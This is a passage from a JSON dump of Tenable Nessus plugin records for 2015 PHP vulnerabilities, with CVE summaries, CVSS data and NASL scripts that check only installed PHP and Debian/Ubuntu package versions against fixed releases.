'unserialize', which can allow a remote attacker to\n execute arbitrary code. Note that this issue is due to\n an incomplete fix for CVE-2014-8142. (CVE-2015-0231)\n\n - An integer overflow error exists in function 'regcomp'\n in the Henry Spencer regex library, due to improper\n validation of user-supplied input. An attacker can\n exploit this to cause a denial of service or to execute\n arbitrary code. (CVE-2015-2305)\n\n - An integer overflow error exists in the '_zip_cdir_new'\n function, due to improper validation of user-supplied\n input. An attacker, using a crafted ZIP archive, can\n exploit this to cause a denial of service or to execute\n arbitrary code. (CVE-2015-2331)\n\n - A filter bypass vulnerability exists due to a flaw in\n the move_uploaded_file() function in which pathnames are\n truncated when a NULL byte is encountered. This allows a\n remote attacker, via a crafted second argument, to\n bypass intended extension restrictions and create files\n with unexpected names. (CVE-2015-2348)\n\n - A user-after-free error exists in the\n process_nested_data() function. This allows a remote\n attacker, via a crafted unserialize call, to dereference\n already freed memory, resulting in the execution of\n arbitrary code. (CVE-2015-2787)\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.4.39\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=69207\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68976\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PHP version 5.4.39 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.4)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.4\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.4.x\", port);\n\nif (version =~ \"^5\\.4\\.([0-9]|[12][0-9]|3[0-8])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.4.39' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:34:43", "references": ["http://php.net/ChangeLog-5.php#5.5.23", "https://bugs.php.net/bug.php?id=69207", "https://bugs.php.net/bug.php?id=68976"], "pluginID": "82026", "description": "According to its banner, the version of PHP 5.5.x installed on the remote host is prior to 5.5.23. It is, therefore, affected by multiple vulnerabilities :\n\n - A use-after-free error exists related to function 'unserialize', which can allow a remote attacker to execute arbitrary code. Note that this issue is due to an incomplete fix for CVE-2014-8142. (CVE-2015-0231)\n\n - An integer overflow error exists in function 'regcomp' in the Henry Spencer regex library, due to improper validation of user-supplied input. An attacker can exploit this to cause a denial of service or to execute arbitrary code. (CVE-2015-2305)\n\n - An integer overflow error exists in the '_zip_cdir_new' function, due to improper validation of user-supplied input. An attacker, using a crafted ZIP archive, can exploit this to cause a denial of service or to execute arbitrary code. (CVE-2015-2331)\n\n - A filter bypass vulnerability exists due to a flaw in the move_uploaded_file() function in which pathnames are truncated when a NULL byte is encountered. This allows a remote attacker, via a crafted second argument, to bypass intended extension restrictions and create files with unexpected names. (CVE-2015-2348)\n\n - A user-after-free error exists in the process_nested_data() function. This allows a remote attacker, via a crafted unserialize call, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2015-2787)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "edition": 5, "reporter": "Tenable", "published": "2015-03-24T00:00:00", "title": "PHP 5.5.x < 5.5.23 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-2305", "CVE-2015-2331", "CVE-2015-0231"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_5_23.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82026", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82026);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2015-0231\",\n \"CVE-2015-2305\",\n \"CVE-2015-2331\",\n \"CVE-2015-2348\",\n \"CVE-2015-2787\"\n );\n script_bugtraq_id(\n 72539,\n 73182,\n 73381,\n 73383,\n 73385,\n 73431,\n 73434\n );\n\n script_name(english:\"PHP 5.5.x < 5.5.23 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.5.x installed on the\nremote host is prior to 5.5.23. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A use-after-free error exists related to function\n 'unserialize', which can allow a remote attacker to\n execute arbitrary code. Note that this issue is due to\n an incomplete fix for CVE-2014-8142. (CVE-2015-0231)\n\n - An integer overflow error exists in function 'regcomp'\n in the Henry Spencer regex library, due to improper\n validation of user-supplied input. An attacker can\n exploit this to cause a denial of service or to execute\n arbitrary code. (CVE-2015-2305)\n\n - An integer overflow error exists in the '_zip_cdir_new'\n function, due to improper validation of user-supplied\n input. An attacker, using a crafted ZIP archive, can\n exploit this to cause a denial of service or to execute\n arbitrary code. (CVE-2015-2331)\n\n - A filter bypass vulnerability exists due to a flaw in\n the move_uploaded_file() function in which pathnames are\n truncated when a NULL byte is encountered. This allows a\n remote attacker, via a crafted second argument, to\n bypass intended extension restrictions and create files\n with unexpected names. (CVE-2015-2348)\n\n - A user-after-free error exists in the\n process_nested_data() function. This allows a remote\n attacker, via a crafted unserialize call, to dereference\n already freed memory, resulting in the execution of\n arbitrary code. (CVE-2015-2787)\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.5.23\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=69207\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68976\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PHP version 5.5.23 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.5)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.5\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.5.x\", port);\n\nif (version =~ \"^5\\.5\\.([0-9]|1[0-9]|2[0-2])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.5.23' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:44:35", "references": ["http://www.debian.org/security/2015/dsa-3198", "https://security-tracker.debian.org/tracker/CVE-2015-2331", "https://security-tracker.debian.org/tracker/CVE-2015-2301", "https://packages.debian.org/source/wheezy/php5"], "pluginID": "81982", "description": "Multiple vulnerabilities have been discovered in the PHP language :\n\n - CVE-2015-2301 Use-after-free in the phar extension.\n\n - CVE-2015-2331 Emmanuel Law discovered an integer overflow in the processing of ZIP archives, resulting in denial of service or potentially the execution of arbitrary code.", "edition": 5, "reporter": "Tenable", "published": "2015-03-23T00:00:00", "title": "Debian DSA-3198-1 : php5 - security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-2301", "CVE-2015-2331"], "modified": "2018-07-10T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:php5", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3198.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81982", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3198. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81982);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/10 14:27:31\");\n\n script_cve_id(\"CVE-2015-2301\", \"CVE-2015-2331\", \"CVE-2015-2348\", \"CVE-2015-2787\");\n script_bugtraq_id(73037, 73182);\n script_xref(name:\"DSA\", value:\"3198\");\n\n script_name(english:\"Debian DSA-3198-1 : php5 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in the PHP language :\n\n - CVE-2015-2301\n Use-after-free in the phar extension.\n\n - CVE-2015-2331\n Emmanuel Law discovered an integer overflow in the\n processing of ZIP archives, resulting in denial of\n service or potentially the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-2301\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-2331\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2015/dsa-3198\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 5.4.39-0+deb7u1. This update also fixes a regression in the\ncurl support introduced in DSA 3195.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libphp5-embed\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php-pear\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cgi\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cli\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-common\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-curl\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dbg\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dev\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-enchant\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-fpm\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gd\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gmp\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-imap\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-interbase\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-intl\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-ldap\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mcrypt\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysql\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysqlnd\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-odbc\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pgsql\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pspell\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-recode\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-snmp\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sqlite\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sybase\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-tidy\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xmlrpc\", reference:\"5.4.39-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xsl\", reference:\"5.4.39-0+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:45:51", "references": ["http://php.net/ChangeLog-5.php#5.6.7", "https://bugs.php.net/bug.php?id=69207", "https://bugs.php.net/bug.php?id=68976"], "pluginID": "82027", "description": "According to its banner, the version of PHP 5.6.x installed on the remote host is prior to 5.6.7. It is, therefore, affected by multiple vulnerabilities :\n\n - A use-after-free error exists related to function 'unserialize', which can allow a remote attacker to execute arbitrary code. Note that this issue is due to an incomplete fix for CVE-2014-8142. (CVE-2015-0231)\n\n - An integer overflow error exists in function 'regcomp' in the Henry Spencer regex library, due to improper validation of user-supplied input. An attacker can exploit this to cause a denial of service or to execute arbitrary code. (CVE-2015-2305)\n\n - An integer overflow error exists in the '_zip_cdir_new' function, due to improper validation of user-supplied input. An attacker, using a crafted ZIP archive, can exploit this to cause a denial of service or to execute arbitrary code. (CVE-2015-2331)\n\n - A filter bypass vulnerability exists due to a flaw in the move_uploaded_file() function in which pathnames are truncated when a NULL byte is encountered. This allows a remote attacker, via a crafted second argument, to bypass intended extension restrictions and create files with unexpected names. (CVE-2015-2348)\n\n - A user-after-free error exists in the process_nested_data() function. This allows a remote attacker, via a crafted unserialize call, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2015-2787)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "edition": 5, "reporter": "Tenable", "published": "2015-03-24T00:00:00", "title": "PHP 5.6.x < 5.6.7 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-2305", "CVE-2015-2331", "CVE-2015-0231"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_6_7.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82027", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82027);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2015-0231\",\n \"CVE-2015-2305\",\n \"CVE-2015-2331\",\n \"CVE-2015-2348\",\n \"CVE-2015-2787\"\n );\n script_bugtraq_id(\n 72539,\n 73182, \n 73381,\n 73383,\n 73385,\n 73431,\n 73434\n );\n\n script_name(english:\"PHP 5.6.x < 5.6.7 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.6.x installed on the\nremote host is prior to 5.6.7. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A use-after-free error exists related to function\n 'unserialize', which can allow a remote attacker to\n execute arbitrary code. Note that this issue is due to\n an incomplete fix for CVE-2014-8142. (CVE-2015-0231)\n\n - An integer overflow error exists in function 'regcomp'\n in the Henry Spencer regex library, due to improper\n validation of user-supplied input. An attacker can\n exploit this to cause a denial of service or to execute\n arbitrary code. (CVE-2015-2305)\n\n - An integer overflow error exists in the '_zip_cdir_new'\n function, due to improper validation of user-supplied\n input. An attacker, using a crafted ZIP archive, can\n exploit this to cause a denial of service or to execute\n arbitrary code. (CVE-2015-2331)\n\n - A filter bypass vulnerability exists due to a flaw in\n the move_uploaded_file() function in which pathnames are\n truncated when a NULL byte is encountered. This allows a\n remote attacker, via a crafted second argument, to\n bypass intended extension restrictions and create files\n with unexpected names. (CVE-2015-2348)\n\n - A user-after-free error exists in the\n process_nested_data() function. This allows a remote\n attacker, via a crafted unserialize call, to dereference\n already freed memory, resulting in the execution of\n arbitrary code. (CVE-2015-2787)\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.6.7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=69207\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68976\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PHP version 5.6.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nif (version =~ \"^5\\.6\\.[0-6]($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.6.7' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:55:21", "references": [], "pluginID": "82911", "description": "It was discovered that PHP incorrectly handled cleanup when used with Apache 2.4. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-3330)\n\nIt was discovered that PHP incorrectly handled opening tar, zip or phar archives through the PHAR extension. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-3329)\n\nIt was discovered that PHP incorrectly handled regular expressions. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-2305)\n\nPaulos Yibelo discovered that PHP incorrectly handled moving files when a pathname contained a null character. A remote attacker could use this issue to possibly bypass filename restrictions. This issue only applied to Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-2348)\n\nIt was discovered that PHP incorrectly handled unserializing PHAR files. A remote attacker could use this issue to cause PHP to possibly expose sensitive information. (CVE-2015-2783)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing certain objects. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-2787).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2015-04-21T00:00:00", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS / 14.10 : php5 vulnerabilities (USN-2572-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2305"], "modified": "2018-08-03T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.10", "p-cpe:/a:canonical:ubuntu_linux:php5-fpm", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2572-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82911", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2572-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82911);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/08/03 12:21:24\");\n\n script_cve_id(\"CVE-2015-2305\", \"CVE-2015-2348\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3329\", \"CVE-2015-3330\");\n script_bugtraq_id(72611, 73431, 73434, 74204);\n script_xref(name:\"USN\", value:\"2572-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS / 14.10 : php5 vulnerabilities (USN-2572-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that PHP incorrectly handled cleanup when used with\nApache 2.4. A remote attacker could use this issue to cause PHP to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. (CVE-2015-3330)\n\nIt was discovered that PHP incorrectly handled opening tar, zip or\nphar archives through the PHAR extension. A remote attacker could use\nthis issue to cause PHP to crash, resulting in a denial of service, or\npossibly execute arbitrary code. (CVE-2015-3329)\n\nIt was discovered that PHP incorrectly handled regular expressions. A\nremote attacker could use this issue to cause PHP to crash, resulting\nin a denial of service, or possibly execute arbitrary code.\n(CVE-2015-2305)\n\nPaulos Yibelo 